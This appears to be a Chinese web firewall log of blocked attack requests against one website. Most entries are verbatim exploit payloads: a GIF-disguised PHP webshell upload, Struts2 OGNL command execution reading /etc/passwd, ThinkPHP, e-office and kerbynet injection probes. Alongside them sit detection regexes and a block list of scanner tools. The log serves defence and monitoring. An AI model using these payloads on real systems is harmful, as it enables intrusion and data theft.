/
home
/
wwwlogs
/
free_waf_log
/
Upload File
HOME
["2023-12-09 00:55:05","221.150.78.114","POST","\/\/cms\/manage\/admin.php?m=manage&c=background&a=action_flashUpload","python-requests\/2.31.0","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/\/cms\/manage\/admin.php?m=manage&c=background&a=action_flashUpload HTTP\/1.1\nhost:www.boyaminge.com\ncontent-type:multipart\/form-data; boundary=3c020396fc5bd06029705525f14f7ab0\nconnection:keep-alive\naccept:*\/*\ncontent-length:373\naccept-encoding:gzip, deflate\nuser-agent:python-requests\/2.31.0\n\n--3c020396fc5bd06029705525f14f7ab0\r\nContent-Disposition: form-data; name=\"filePath\"; filename=\"report.php\"\r\nContent-Type: video\/x-flv\r\nExpires: 0\r\n\r\nGIF89a\r\n<?php\r\nfunction _host()\r\n{\r\n $a=str_replace('','',$_REQUEST[admin]);\r\n return ';'.$a;\r\n}\r\n$sql = @mysqli_connect(@eval('echo NULL'._host()),\"xxx\",\"xxx\",\"xxxx\");?>\r\n--3c020396fc5bd06029705525f14f7ab0--\r\n"] ["2023-12-09 01:35:51","34.232.51.180","GET","\/h5\/js\/chunk-5bfab075.a4a34987.js","Lynx\/2.8.7dev.4 libwww-FM\/2.14 SSL-MM\/1.4.1 OpenSSL\/0.9.8d","user_agent","(HTTrack|Apache-HttpClient|harvest|audit|dirbuster|pangolin|nmap|sqln|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|zmeu|BabyKrokodil|netsparker|httperf| SF\/) >> 1:Lynx\/2.8.7dev.4 libwww-FM\/2.14 SSL-MM\/1.4.1 OpenSSL\/0.9.8d","GET \/h5\/js\/chunk-5bfab075.a4a34987.js HTTP\/1.1\nhost:www.boyaminge.com\nconnection:close\naccept-encoding:gzip\naccept-charset:utf-8\nuser-agent:Lynx\/2.8.7dev.4 libwww-FM\/2.14 SSL-MM\/1.4.1 OpenSSL\/0.9.8d\n\n"] ["2023-12-09 03:24:46","221.150.78.114","GET","\/\/?s=..\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1155.40 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET \/\/?s=..\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1155.40 Safari\/537.36\n\n"] ["2023-12-09 03:25:29","221.150.78.114","GET","\/\/?s=..\/%5Cthink%5CContainer\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1641.132 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET \/\/?s=..\/%5Cthink%5CContainer\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1641.132 Safari\/537.36\n\n"] ["2023-12-09 03:26:06","221.150.78.114","GET","\/\/?s=\/index\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.234.53 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET \/\/?s=\/index\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/60.0.234.53 Safari\/537.36\n\n"] ["2023-12-09 03:26:45","221.150.78.114","GET","\/\/?s=\/index\/%5Cthink%5CContainer\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1283.27 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET \/\/?s=\/index\/%5Cthink%5CContainer\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/62.0.1283.27 Safari\/537.36\n\n"] ["2023-12-09 03:27:36","221.150.78.114","GET","\/\/?s=\/Home\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/61.0.1810.85 Safari\/537.36","args","(invokefunction|call_user_func_array|\\\\think\\\\) >> function:call_user_func_array","GET \/\/?s=\/Home\/%5Cthink%5Capp\/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP\/1.1\nhost:www.boyaminge.com\nconnection:keep-alive\naccept:*\/*\naccept-encoding:gzip, deflate\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/61.0.1810.85 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}","Mozilla\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/53.0.2820.59 Safari\/537.36","args","\\:\\$ >> redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}","GET \/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP\/1.1\nhost:www.boyaminge.com\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/53.0.2820.59 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","POST","\/general\/index\/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/general\/index\/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP\/1.1\nhost:www.boyaminge.com\ncontent-type:multipart\/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4\nconnection:close\ncontent-length:235\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36\n\n--e64bdf16c554bbc109cecef6451c26a4\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"2ZHwJShFgRmUDxtYk96vJNbzonO.php\"\r\nContent-Type: image\/jpeg\r\n\r\n<?php echo md5('CNVD-2021-49104');?>\r\n\r\n--e64bdf16c554bbc109cecef6451c26a4--\r\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}","Mozilla\/5.0 (Windows NT 6.4; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2225.0 Safari\/537.36","args","\\:\\$ >> redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}","GET \/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP\/1.1\nhost:www.boyaminge.com\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.4; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2225.0 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20\/etc\/passwd","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36","args","(?:etc\\\/\\W*passwd) >> cmd:cat \/etc\/passwd","GET \/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20\/etc\/passwd HTTP\/1.1\nhost:www.boyaminge.com\naccept-encoding:gzip\nconnection:close\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/cgi-bin\/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;\/root\/kerbynet.cgi\/scripts\/getkey%20..\/..\/..\/etc\/passwd;%22","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/37.0.2062.124 Safari\/537.36","args","\\.\\.\/\\.\\.\/ >> type:*\";\/root\/kerbynet.cgi\/scripts\/getkey ..\/..\/..\/etc\/passwd;\"","GET \/cgi-bin\/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;\/root\/kerbynet.cgi\/scripts\/getkey%20..\/..\/..\/etc\/passwd;%22 HTTP\/1.1\nhost:www.boyaminge.com\naccept-language:en\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/37.0.2062.124 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D","Mozilla\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2225.0 Safari\/537.36","args","\\:\\$ >> redirect:${#context[\"xwork.MethodAccessor.denyMethodExecution\"]=false,#f=#_memberAccess.getClass().getDeclaredField(\"allowStaticMethodAccess\"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec(\"sh -c id\").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}","GET \/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP\/1.1\nhost:www.boyaminge.com\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2225.0 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/oauth\/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http:\/\/test","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36","args","\\$\\{ >> response_type:${13337*73331}","GET \/oauth\/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http:\/\/test HTTP\/1.1\nhost:www.boyaminge.com\naccept-language:en\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36\n\n"] ["2023-12-09 11:24:08","221.150.72.75","GET","\/oauth\/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http:\/\/test","Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36","args","60秒以内累计超过6次以上非法请求,封锁180秒","GET \/oauth\/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http:\/\/test HTTP\/1.1\nhost:www.boyaminge.com\naccept-language:en\nconnection:close\naccept:*\/*\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/36.0.1985.67 Safari\/537.36\n\n"]